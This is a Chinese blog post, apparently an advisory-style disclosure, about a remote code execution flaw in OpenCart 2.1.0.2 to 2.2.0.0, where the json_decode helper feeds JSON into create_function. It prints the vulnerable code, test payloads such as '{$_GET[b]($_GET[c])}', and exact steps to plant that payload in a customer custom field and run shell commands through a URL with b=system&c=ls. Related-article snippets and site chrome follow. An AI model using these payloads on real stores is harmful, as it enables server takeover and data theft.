php json_ 漏洞,OpenCart json_decode函数中存在远程PHP代码执行漏洞

最新推荐文章于 2023-05-02 17:47:49 发布
最新推荐文章于 2023-05-02 17:47:49 发布
阅读量1.1k 收藏
点赞数
文章标签: php json_ 漏洞

发现OpenCart json_decode函数中存在远程PHP代码执行漏洞,涉及到的版本有2.1.0.2 到 2.2.0.0 (最新版本)

漏洞存在于 /upload/system/helper/json.php中,其中有这段代码

1

2

3

4

5

6

7

8

9

# /upload/system/helper/json.php

$match = '/".*?(?

$string = preg_replace($match, '', $json);

$string = preg_replace('/[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/', '', $string);

...

$function = @create_function('', "return {$json};"); /**** 万恶之源 ****/

$return = ($function) ? $function() : null;

...

return $return;

其中通过json进行了函数的创建,而json_decode函数可被利用

这里是几个简单的测试例子

var_dump(json_decode('{"ok":"1"."2"."3"}'));

816f5a629783bbdcacda6e0874fb8baa.png

var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}'));

99b3b4f41b5f36b8b67ea06193d759a8.png

var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}'));

9127ebb329361febc44b68c5821afb72.png

d46f288ca7ae6d6e46f341cea0cba783.png

0cdd64707d70cc2cc6d51025c632da9b.png

在真实场景中,可以通过/index.php?route=account/edit进行利用

例如将$_SERVER[HTTP_USER_AGENT]作为姓名填写进去,保存(需要重复两次)

97e6dae5dd474054ccd6c4cd32edfbcc.png

之后当管理员访问管理面板时,他会在最近活动中本应显示你的姓名的地方看到他自己的UserAgent

63931e614c5c38dc93cc09b1b1740ea7.png

另一个例子是在account/edit 或者 account/register 中的 custom_field ,在这里进行利用可能是最合适的

如果管理员在/admin/index.php?route=customer/custom_field中添加了一个自定义的区域用于电话号码之类的额外信息

329cb17d85661eda13a739265093b6a0.png

你就可以直接注入你的代码在这个custom_field中

例如将{$_GET[b]($_GET[c])}填写到这个custom_field中,保存

8718c067b063c0dab8348a64935e5590.png

然后访问

http://host/shop_directory/index.php?route=account/edit&b=system&c=ls

你会看到代码被正确执行了

eb5aebc29dcb3532419021fc0e7cd149.png

a493a5c4f8d0a6473be32ec63e1f82e6.png

(责任编辑:最模板)

蒙氏宝宝
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php-dos-attack:利用PHPjson_decode漏洞
05-13
PHP服务器上模拟哈希冲突攻击 签出。 这个怎么运作 PHP哈希表容易受到复杂性攻击。 因此,每个需要外部输入并在PHP哈希表进行解析的函数都容易受到复杂性攻击。 测试PHP漏洞以进行碰撞攻击 在目录test ,有PHP脚本演示了使用PHP映射的函数漏洞。 文件collision_keys_small.txt仅包含1万个条目。 如果您想测试真实交易,则应使用collision_keys.txt (64k条目)尝试这些攻击。 运行测试 运行测试以将冲突键插入数组: docker run -it \ -v "$PWD":/usr/src/app -w /usr/src/app php:5.6-cli \ php test/array.php collision_keys.txt 运行测试以针对具有冲突键的JSON键值对调用json_decode : docker run -it -
docker_opencart
04-29
docker_opencart 从DockerHub提取图像:- docker pull webkul / opencart 使用以下命令运行此图像的容器: “ docker run -d -p 80:80 -p 3306:3306 webkul / opencart:latest” 注意:主机系统的端口80和3306上不...
Goby漏洞更新|OpenCart So Newsletter Custom Popup 4.0 模块 email 参数 SQL 注入漏洞
m0_46699477的博客
04-13 433
OpenCart Newsletter Custom Popup模块是一个用于时事通讯订阅的模块。在Opencart Newsletter Custom Popup 4.0模块extension/module/so_newletter_custom_popup/newsletter 接口的email参数由于过滤不当导致存在SQL注入漏洞
PHP反序列漏洞
u011250160的博客
04-12 281
在程序执行结束时,内存数据便会立即销毁,变量所储存的数据便是内存数据,而文件、数据库是“持久数据”,因此PHP序列化就是将内存的变量数据“保存”到文件的持久数据的过程。 常见的php序列化和反序列化方式主要有:serialize,unserialize;json_encode,json_decode。 例1: class Demo { private $file = '123.php'; } $a = new Demo; $s = serialize($a); echo $s; 结果: O:4
php流行性注入漏洞利用,OpenCart 'Cart::getProducts()'方法PHP对象注入漏洞
weixin_39715187的博客
03-10 548
发布日期:2014-07-14更新日期:2014-07-16受影响系统:OpenCart OpenCart 1.5.6.4描述:--------------------------------------------------------------------------------BUGTRAQ ID: 68529CVE(CAN) ID: CVE-2014-3990OpenCart是基于P...
facebook_ads_extension.ocmod_opencart_rhymemtv_php_
10-02
disabilted coupon to product special opencart
PagSeguro-Checkout-Transparente.ocmod_opencart_checkout_php_
10-03
checkout transparent pag seguro nulled
opencart-3.7-ifree_opencart3.7_opencart_
10-03
opencart_international_3.7
dquickcheckoutpackcompiledoc3v7.2.2.ocmod_Quick_opencart_checkou
10-01
opencart quickcheckout module free v7.2.2
适合与431版本的内核
03-20
kernel-2.6.32-431.el6.x86_64.rpm,内核版本试用于431
JSONP漏洞分析及利用方式
ak.Gh0st的博客
11-02 1516
jSONP 的最基本的原理是:动态添加一个< script >标签,而 script 标签的 src 属性是没有跨域的限制的。由于同源策略的限制,XmlHttpRequest 只允许请求当前源(域名、协议、端口都相同)的资源,如果要进行跨域请求, 我们可以通过使用 html 的 script 标记来进行跨域请求,并在响应返回要执行的 script 代码,其可以直接使用 JSON 传递 javascript 对象。
PHP调用Google翻译的程序类
战国墨竹的博客
04-20 2987
/* *Google翻译PHP接口 */ $Google = new Google(); echo $Google-&gt;translate('国', 'en'); class Google{ public $out = ""; public $google_translator_url = 'http://translate.google.com/translate...
PHP注入漏洞(附代码,具体步骤)
gl620321的博客
08-01 1647
一、命令注入(敏感函数定向法) 1.概念: 在PHP脚本,我们可以对输入进行注入攻击。什么是注入?注入即是通过利用无验证码变量构造特殊语句对服务器进行渗透。 注入的种类有很多,而不仅仅只是SQL Injection 2.分类 命令注入(Commend Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cro...
php怎么更改json里面的值_WEB漏洞 PHP 反序列化 (无类)
weixin_39926402的博客
01-24 110
#PHP反序列化原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象的一些魔术方法。serialize() //将一个对象转换成一个字符串unserialize() //将字符串还原成一个对象在理解这个漏洞前,你需要先搞清...
JSONP跨域访问漏洞
Echo__h的博客
05-02 420
构造如下页面,创建恶意链接诱使用户点击,即可获取用户的信息// 调用stringfy方法,将JSON对象转换为字符串 alert(JSON . stringify(args));//"></script> // %2B为+ %26为& < / script >模拟用户访问,成功将cookie和url地址添加到数据库。
json劫持漏洞
RMC131的博客
04-19 286
JSON是一种轻量级的数据交换格式,劫持就对数据进行窃取。攻击者通过某些特定的手段。将本应返回已给用户的JSON数据进行拦截,转发给攻击者。一般劫持的JSON数据都是。攻击方法与CSRF类似。需要用户登录账号,在身份是认证没有消除的情况下访问攻击者设计好的页面。进而获取JSON数据,并转发给攻击者。
(日更)PHP反序化漏洞解析(2) PHP序列化/反序列化过程
AAAAAAAAAAAA66的博客
11-26 662
上文我们简单介绍了下PHP序列化,及为什么要序列化。 弄清楚前面2个知识点后,理解这个过程会更容易。 *****PHP语言常用的序列化和反序列化函数有serialize,unserialize,json_encode和json_decode. *****这里介绍serialize,unserialize函数。 serialize函数 当序列化对象时,PHP在序列化动作之前调用魔法函数 __sleep,这样就允许对象在被序列化之前做任何清楚操作。 魔法函数:在php的语法,有一些系统自带的方
JSONP数据劫持漏洞
qq_50854662的博客
04-19 1087
JSONP数据劫持漏洞
php mvc 目录结构,opencart入门之目录结构以及MVC结构
最新发布
05-28
OpenCart 入门之目录结构以及 MVC 结构: ``` admin/ controller/ 控制器目录 language/ 语言目录 model/ 模型目录 view/ 视图目录 catalog/ controller/ 控制器目录 language/ 语言目录 model/ 模型目录 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值